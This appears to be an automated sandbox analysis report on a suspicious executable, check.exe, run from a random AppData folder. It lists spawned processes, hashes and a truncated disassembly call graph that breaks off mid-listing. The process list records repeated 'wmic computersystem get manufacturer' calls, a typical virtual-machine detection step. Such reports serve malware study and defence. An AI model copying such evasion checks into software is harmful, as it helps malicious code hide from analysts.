                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                        Start time:00:45:26
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff7124f0000
                                                                                                                                                                                                                                        File size:38'734'342 bytes
                                                                                                                                                                                                                                        MD5 hash:00152720A2C1C6969E3581E2DABC6702
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                        Start time:00:45:27
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
                                                                                                                                                                                                                                        Imagebase:0x7ff627bd0000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                        Start time:00:45:27
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                        Start time:00:45:27
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:wmic computersystem get manufacturer
                                                                                                                                                                                                                                        Imagebase:0x7ff61c4e0000
                                                                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                        Start time:00:45:33
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 1520 -s 892
                                                                                                                                                                                                                                        Imagebase:0x7ff67e620000
                                                                                                                                                                                                                                        File size:570'736 bytes
                                                                                                                                                                                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                        Start time:00:45:35
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff7124f0000
                                                                                                                                                                                                                                        File size:38'734'342 bytes
                                                                                                                                                                                                                                        MD5 hash:00152720A2C1C6969E3581E2DABC6702
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                                        Start time:00:45:35
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff7124f0000
                                                                                                                                                                                                                                        File size:38'734'342 bytes
                                                                                                                                                                                                                                        MD5 hash:00152720A2C1C6969E3581E2DABC6702
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                                        Start time:00:45:41
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
                                                                                                                                                                                                                                        Imagebase:0x7ff627bd0000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                                        Start time:00:45:41
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                                        Start time:00:45:42
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:wmic computersystem get manufacturer
                                                                                                                                                                                                                                        Imagebase:0x7ff6a5670000
                                                                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                                        Start time:00:45:44
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 3608 -s 968
                                                                                                                                                                                                                                        Imagebase:0x7ff67e620000
                                                                                                                                                                                                                                        File size:570'736 bytes
                                                                                                                                                                                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                        Start time:00:45:45
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
                                                                                                                                                                                                                                        Imagebase:0x7ff7124f0000
                                                                                                                                                                                                                                        File size:38'734'342 bytes
                                                                                                                                                                                                                                        MD5 hash:00152720A2C1C6969E3581E2DABC6702
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                                        Start time:00:45:50
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
                                                                                                                                                                                                                                        Imagebase:0x7ff627bd0000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                                                                        Start time:00:45:50
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                                        Start time:00:45:50
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:wmic computersystem get manufacturer
                                                                                                                                                                                                                                        Imagebase:0x7ff61c4e0000
                                                                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                        Start time:00:45:53
                                                                                                                                                                                                                                        Start date:07/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 5300 -s 932
                                                                                                                                                                                                                                        Imagebase:0x7ff67e620000
                                                                                                                                                                                                                                        File size:570'736 bytes
                                                                                                                                                                                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:10.4%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:17.1%
                                                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                                                          Total number of Limit Nodes:34
                                                                                                                                                                                                                                          execution_graph 19670 7ff71251adfe 19671 7ff71251ae17 19670->19671 19672 7ff71251ae0d 19670->19672 19674 7ff712510338 LeaveCriticalSection 19672->19674 16711 7ff71250f98c 16712 7ff71250fb7e 16711->16712 16714 7ff71250f9ce _isindst 16711->16714 16713 7ff712504f08 _get_daylight 11 API calls 16712->16713 16731 7ff71250fb6e 16713->16731 16714->16712 16717 7ff71250fa4e _isindst 16714->16717 16715 7ff7124fc550 _log10_special 8 API calls 16716 7ff71250fb99 16715->16716 16732 7ff712516194 16717->16732 16722 7ff71250fbaa 16724 7ff71250a900 _isindst 17 API calls 16722->16724 16726 7ff71250fbbe 16724->16726 16729 7ff71250faab 16729->16731 16756 7ff7125161d8 16729->16756 16731->16715 16733 7ff71250fa6c 16732->16733 16734 7ff7125161a3 16732->16734 16738 7ff712515598 16733->16738 16763 7ff7125102d8 EnterCriticalSection 16734->16763 16739 7ff71250fa81 16738->16739 16740 7ff7125155a1 16738->16740 16739->16722 16744 7ff7125155c8 16739->16744 16741 7ff712504f08 _get_daylight 11 API calls 16740->16741 16742 7ff7125155a6 16741->16742 16743 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 16742->16743 16743->16739 16745 7ff71250fa92 16744->16745 16746 7ff7125155d1 16744->16746 16745->16722 16750 7ff7125155f8 16745->16750 16747 7ff712504f08 _get_daylight 11 API calls 16746->16747 16748 7ff7125155d6 16747->16748 16749 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 16748->16749 16749->16745 16751 7ff712515601 16750->16751 16755 7ff71250faa3 16750->16755 16752 7ff712504f08 _get_daylight 11 API calls 16751->16752 16753 7ff712515606 16752->16753 16754 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 16753->16754 16754->16755 16755->16722 16755->16729 16764 7ff7125102d8 EnterCriticalSection 16756->16764 16765 7ff7124fbae0 16766 7ff7124fbb0e 16765->16766 16767 7ff7124fbaf5 16765->16767 16767->16766 16769 7ff71250d5fc 12 API calls 16767->16769 16768 7ff7124fbb6e 16769->16768 19752 7ff712505410 19753 7ff71250541b 19752->19753 19761 7ff71250f2a4 19753->19761 19774 7ff7125102d8 EnterCriticalSection 19761->19774 16770 7ff712509961 16782 7ff71250a3d8 16770->16782 16783 7ff71250b150 __GetCurrentState 45 API calls 16782->16783 16784 7ff71250a3e1 16783->16784 16785 7ff71250a504 __GetCurrentState 45 API calls 16784->16785 16786 7ff71250a401 16785->16786 19775 7ff71251abe3 19776 7ff71251abf3 19775->19776 19779 7ff712505478 LeaveCriticalSection 19776->19779 19483 7ff71251ad69 19486 7ff712505478 LeaveCriticalSection 19483->19486 19318 7ff712505628 19319 7ff712505642 19318->19319 19320 7ff71250565f 19318->19320 19322 7ff712504ee8 _fread_nolock 11 API calls 19319->19322 19320->19319 19321 7ff712505672 CreateFileW 19320->19321 19324 7ff7125056a6 19321->19324 19325 7ff7125056dc 19321->19325 19323 7ff712505647 19322->19323 19326 7ff712504f08 _get_daylight 11 API calls 19323->19326 19343 7ff71250577c GetFileType 19324->19343 19369 7ff712505c04 19325->19369 19329 7ff71250564f 19326->19329 19332 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 19329->19332 19339 7ff71250565a 19332->19339 19333 7ff7125056d1 CloseHandle 19333->19339 19334 7ff7125056bb CloseHandle 19334->19339 19335 7ff7125056e5 19337 7ff712504e7c _fread_nolock 11 API calls 19335->19337 19336 7ff712505710 19390 7ff7125059c4 19336->19390 19342 7ff7125056ef 19337->19342 19342->19339 19344 7ff7125057ca 19343->19344 19345 7ff712505887 19343->19345 19346 7ff7125057f6 GetFileInformationByHandle 19344->19346 19349 7ff712505b00 21 API calls 19344->19349 19347 7ff7125058b1 19345->19347 19348 7ff71250588f 19345->19348 19350 7ff7125058a2 GetLastError 19346->19350 19351 7ff71250581f 19346->19351 19353 7ff7125058d4 PeekNamedPipe 19347->19353 19360 7ff712505872 19347->19360 19348->19350 19352 7ff712505893 19348->19352 19354 7ff7125057e4 19349->19354 19357 7ff712504e7c _fread_nolock 11 API calls 19350->19357 19355 7ff7125059c4 51 API calls 19351->19355 19356 7ff712504f08 _get_daylight 11 API calls 19352->19356 19353->19360 19354->19346 19354->19360 19359 7ff71250582a 19355->19359 19356->19360 19357->19360 19358 7ff7124fc550 _log10_special 8 API calls 19361 7ff7125056b4 19358->19361 19407 7ff712505924 19359->19407 19360->19358 19361->19333 19361->19334 19364 7ff712505924 10 API calls 19365 7ff712505849 19364->19365 19366 7ff712505924 10 API calls 19365->19366 19367 7ff71250585a 19366->19367 19367->19360 19368 7ff712504f08 _get_daylight 11 API calls 19367->19368 19368->19360 19370 7ff712505c3a 19369->19370 19371 7ff712505cd2 __vcrt_freefls 19370->19371 19372 7ff712504f08 _get_daylight 11 API calls 19370->19372 19373 7ff7124fc550 _log10_special 8 API calls 19371->19373 19374 7ff712505c4c 19372->19374 19375 7ff7125056e1 19373->19375 19376 7ff712504f08 _get_daylight 11 API calls 19374->19376 19375->19335 19375->19336 19377 7ff712505c54 19376->19377 19378 7ff712507e08 45 API calls 19377->19378 19379 7ff712505c69 19378->19379 19380 7ff712505c71 19379->19380 19381 7ff712505c7b 19379->19381 19382 7ff712504f08 _get_daylight 11 API calls 19380->19382 19383 7ff712504f08 _get_daylight 11 API calls 19381->19383 19387 7ff712505c76 19382->19387 19384 7ff712505c80 19383->19384 19384->19371 19385 7ff712504f08 _get_daylight 11 API calls 19384->19385 19386 7ff712505c8a 19385->19386 19388 7ff712507e08 45 API calls 19386->19388 19387->19371 19389 7ff712505cc4 GetDriveTypeW 19387->19389 19388->19387 19389->19371 19392 7ff7125059ec 19390->19392 19391 7ff71250571d 19400 7ff712505b00 19391->19400 19392->19391 19414 7ff71250f724 19392->19414 19394 7ff712505a80 19394->19391 19395 7ff71250f724 51 API calls 19394->19395 19396 7ff712505a93 19395->19396 19396->19391 19397 7ff71250f724 51 API calls 19396->19397 19398 7ff712505aa6 19397->19398 19398->19391 19399 7ff71250f724 51 API calls 19398->19399 19399->19391 19401 7ff712505b1a 19400->19401 19402 7ff712505b51 19401->19402 19403 7ff712505b2a 19401->19403 19404 7ff71250f5b8 21 API calls 19402->19404 19405 7ff712504e7c _fread_nolock 11 API calls 19403->19405 19406 7ff712505b3a 19403->19406 19404->19406 19405->19406 19406->19342 19408 7ff712505940 19407->19408 19409 7ff71250594d FileTimeToSystemTime 19407->19409 19408->19409 19411 7ff712505948 19408->19411 19410 7ff712505961 SystemTimeToTzSpecificLocalTime 19409->19410 19409->19411 19410->19411 19412 7ff7124fc550 _log10_special 8 API calls 19411->19412 19413 7ff712505839 19412->19413 19413->19364 19415 7ff71250f755 19414->19415 19416 7ff71250f731 19414->19416 19418 7ff71250f78f 19415->19418 19421 7ff71250f7ae 19415->19421 19416->19415 19417 7ff71250f736 19416->19417 19419 7ff712504f08 _get_daylight 11 API calls 19417->19419 19420 7ff712504f08 _get_daylight 11 API calls 19418->19420 19422 7ff71250f73b 19419->19422 19423 7ff71250f794 19420->19423 19424 7ff712504f4c 45 API calls 19421->19424 19425 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 19422->19425 19426 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 19423->19426 19428 7ff71250f7bb 19424->19428 19427 7ff71250f746 19425->19427 19429 7ff71250f79f 19426->19429 19427->19394 19428->19429 19430 7ff7125104dc 51 API calls 19428->19430 19429->19394 19430->19428 15899 7ff7125108c8 15900 7ff7125108ec 15899->15900 15904 7ff7125108fc 15899->15904 16050 7ff712504f08 15900->16050 15902 7ff7125108f1 15903 7ff712510bdc 15906 7ff712504f08 _get_daylight 11 API calls 15903->15906 15904->15903 15905 7ff71251091e 15904->15905 15909 7ff71251093f 15905->15909 16053 7ff712510f84 15905->16053 15907 7ff712510be1 15906->15907 15910 7ff71250a948 __free_lconv_num 11 API calls 15907->15910 15911 7ff7125109b1 15909->15911 15913 7ff712510965 15909->15913 15918 7ff7125109a5 15909->15918 15910->15902 15915 7ff71250eb98 _get_daylight 11 API calls 15911->15915 15928 7ff712510974 15911->15928 15912 7ff712510a5e 15921 7ff712510a7b 15912->15921 15929 7ff712510acd 15912->15929 16068 7ff7125096c0 15913->16068 15919 7ff7125109c7 15915->15919 15918->15912 15918->15928 16080 7ff71251712c 15918->16080 15922 7ff71250a948 __free_lconv_num 11 API calls 15919->15922 15925 7ff71250a948 __free_lconv_num 11 API calls 15921->15925 15926 7ff7125109d5 15922->15926 15923 7ff71251098d 15923->15918 15931 7ff712510f84 45 API calls 15923->15931 15924 7ff71251096f 15927 7ff712504f08 _get_daylight 11 API calls 15924->15927 15930 7ff712510a84 15925->15930 15926->15918 15926->15928 15933 7ff71250eb98 _get_daylight 11 API calls 15926->15933 15927->15928 16074 7ff71250a948 15928->16074 15929->15928 15932 7ff7125133dc 40 API calls 15929->15932 15940 7ff712510a89 15930->15940 16116 7ff7125133dc 15930->16116 15931->15918 15934 7ff712510b0a 15932->15934 15935 7ff7125109f7 15933->15935 15936 7ff71250a948 __free_lconv_num 11 API calls 15934->15936 15938 7ff71250a948 __free_lconv_num 11 API calls 15935->15938 15939 7ff712510b14 15936->15939 15938->15918 15939->15928 15939->15940 15941 7ff712510bd0 15940->15941 16030 7ff71250eb98 15940->16030 15943 7ff71250a948 __free_lconv_num 11 API calls 15941->15943 15942 7ff712510ab5 15944 7ff71250a948 __free_lconv_num 11 API calls 15942->15944 15943->15902 15944->15940 15947 7ff712510b69 16037 7ff71250a4a4 15947->16037 15948 7ff712510b60 15949 7ff71250a948 __free_lconv_num 11 API calls 15948->15949 15951 7ff712510b67 15949->15951 15957 7ff71250a948 __free_lconv_num 11 API calls 15951->15957 15953 7ff712510c0b 16046 7ff71250a900 IsProcessorFeaturePresent 15953->16046 15954 7ff712510b80 16125 7ff712517244 15954->16125 15957->15902 15960 7ff712510ba7 15965 7ff712504f08 _get_daylight 11 API calls 15960->15965 15961 7ff712510bc8 15964 7ff71250a948 __free_lconv_num 11 API calls 15961->15964 15964->15941 15966 7ff712510bac 15965->15966 15969 7ff71250a948 __free_lconv_num 11 API calls 15966->15969 15969->15951 16031 7ff71250eba9 _get_daylight 16030->16031 16032 7ff71250ebfa 16031->16032 16033 7ff71250ebde HeapAlloc 16031->16033 16144 7ff712513590 16031->16144 16035 7ff712504f08 _get_daylight 10 API calls 16032->16035 16033->16031 16034 7ff71250ebf8 16033->16034 16034->15947 16034->15948 16035->16034 16038 7ff71250a4b1 16037->16038 16040 7ff71250a4bb 16037->16040 16038->16040 16044 7ff71250a4d6 16038->16044 16039 7ff712504f08 _get_daylight 11 API calls 16041 7ff71250a4c2 16039->16041 16040->16039 16153 7ff71250a8e0 16041->16153 16042 7ff71250a4ce 16042->15953 16042->15954 16044->16042 16045 7ff712504f08 _get_daylight 11 API calls 16044->16045 16045->16041 16047 7ff71250a913 16046->16047 16215 7ff71250a614 16047->16215 16237 7ff71250b2c8 GetLastError 16050->16237 16052 7ff712504f11 16052->15902 16054 7ff712510fb9 16053->16054 16061 7ff712510fa1 16053->16061 16055 7ff71250eb98 _get_daylight 11 API calls 16054->16055 16064 7ff712510fdd 16055->16064 16056 7ff712511062 16254 7ff71250a504 16056->16254 16057 7ff71251103e 16059 7ff71250a948 __free_lconv_num 11 API calls 16057->16059 16059->16061 16061->15909 16062 7ff71250eb98 _get_daylight 11 API calls 16062->16064 16063 7ff71250a948 __free_lconv_num 11 API calls 16063->16064 16064->16056 16064->16057 16064->16062 16064->16063 16065 7ff71250a4a4 __std_exception_copy 37 API calls 16064->16065 16066 7ff71251104d 16064->16066 16065->16064 16067 7ff71250a900 _isindst 17 API calls 16066->16067 16067->16056 16069 7ff7125096d0 16068->16069 16072 7ff7125096d9 16068->16072 16069->16072 16320 7ff712509198 16069->16320 16072->15923 16072->15924 16075 7ff71250a94d RtlFreeHeap 16074->16075 16079 7ff71250a97c 16074->16079 16076 7ff71250a968 GetLastError 16075->16076 16075->16079 16077 7ff71250a975 __free_lconv_num 16076->16077 16078 7ff712504f08 _get_daylight 9 API calls 16077->16078 16078->16079 16079->15902 16081 7ff712517139 16080->16081 16082 7ff712516254 16080->16082 16084 7ff712504f4c 45 API calls 16081->16084 16083 7ff712516261 16082->16083 16089 7ff712516297 16082->16089 16087 7ff712504f08 _get_daylight 11 API calls 16083->16087 16103 7ff712516208 16083->16103 16086 7ff71251716d 16084->16086 16085 7ff7125162c1 16088 7ff712504f08 _get_daylight 11 API calls 16085->16088 16090 7ff712517172 16086->16090 16095 7ff712517183 16086->16095 16098 7ff71251719a 16086->16098 16091 7ff71251626b 16087->16091 16093 7ff7125162c6 16088->16093 16089->16085 16094 7ff7125162e6 16089->16094 16090->15918 16092 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 16091->16092 16096 7ff712516276 16092->16096 16097 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 16093->16097 16104 7ff712504f4c 45 API calls 16094->16104 16109 7ff7125162d1 16094->16109 16099 7ff712504f08 _get_daylight 11 API calls 16095->16099 16096->15918 16097->16109 16101 7ff7125171a4 16098->16101 16102 7ff7125171b6 16098->16102 16100 7ff712517188 16099->16100 16105 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 16100->16105 16106 7ff712504f08 _get_daylight 11 API calls 16101->16106 16107 7ff7125171c7 16102->16107 16108 7ff7125171de 16102->16108 16103->15918 16104->16109 16105->16090 16110 7ff7125171a9 16106->16110 16613 7ff7125162a4 16107->16613 16622 7ff712518f4c 16108->16622 16109->15918 16113 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 16110->16113 16113->16090 16115 7ff712504f08 _get_daylight 11 API calls 16115->16090 16117 7ff71251341b 16116->16117 16118 7ff7125133fe 16116->16118 16119 7ff712513425 16117->16119 16662 7ff712517c38 16117->16662 16118->16117 16120 7ff71251340c 16118->16120 16669 7ff712517c74 16119->16669 16122 7ff712504f08 _get_daylight 11 API calls 16120->16122 16124 7ff712513411 __scrt_get_show_window_mode 16122->16124 16124->15942 16126 7ff712504f4c 45 API calls 16125->16126 16127 7ff7125172aa 16126->16127 16128 7ff7125172b8 16127->16128 16681 7ff71250ef24 16127->16681 16684 7ff7125054ac 16128->16684 16132 7ff7125173a4 16135 7ff7125173b5 16132->16135 16136 7ff71250a948 __free_lconv_num 11 API calls 16132->16136 16133 7ff712504f4c 45 API calls 16134 7ff712517327 16133->16134 16138 7ff71250ef24 5 API calls 16134->16138 16140 7ff712517330 16134->16140 16137 7ff712510ba3 16135->16137 16139 7ff71250a948 __free_lconv_num 11 API calls 16135->16139 16136->16135 16137->15960 16137->15961 16138->16140 16139->16137 16141 7ff7125054ac 14 API calls 16140->16141 16142 7ff71251738b 16141->16142 16142->16132 16143 7ff712517393 SetEnvironmentVariableW 16142->16143 16143->16132 16147 7ff7125135d0 16144->16147 16152 7ff7125102d8 EnterCriticalSection 16147->16152 16156 7ff71250a778 16153->16156 16155 7ff71250a8f9 16155->16042 16157 7ff71250a7a3 16156->16157 16160 7ff71250a814 16157->16160 16159 7ff71250a7ca 16159->16155 16170 7ff71250a55c 16160->16170 16164 7ff71250a84f 16164->16159 16166 7ff71250a900 _isindst 17 API calls 16167 7ff71250a8df 16166->16167 16168 7ff71250a778 _invalid_parameter_noinfo 37 API calls 16167->16168 16169 7ff71250a8f9 16168->16169 16169->16159 16171 7ff71250a578 GetLastError 16170->16171 16172 7ff71250a5b3 16170->16172 16173 7ff71250a588 16171->16173 16172->16164 16176 7ff71250a5c8 16172->16176 16179 7ff71250b390 16173->16179 16177 7ff71250a5fc 16176->16177 16178 7ff71250a5e4 GetLastError SetLastError 16176->16178 16177->16164 16177->16166 16178->16177 16180 7ff71250b3ca FlsSetValue 16179->16180 16181 7ff71250b3af FlsGetValue 16179->16181 16182 7ff71250b3d7 16180->16182 16193 7ff71250a5a3 SetLastError 16180->16193 16183 7ff71250b3c4 16181->16183 16181->16193 16184 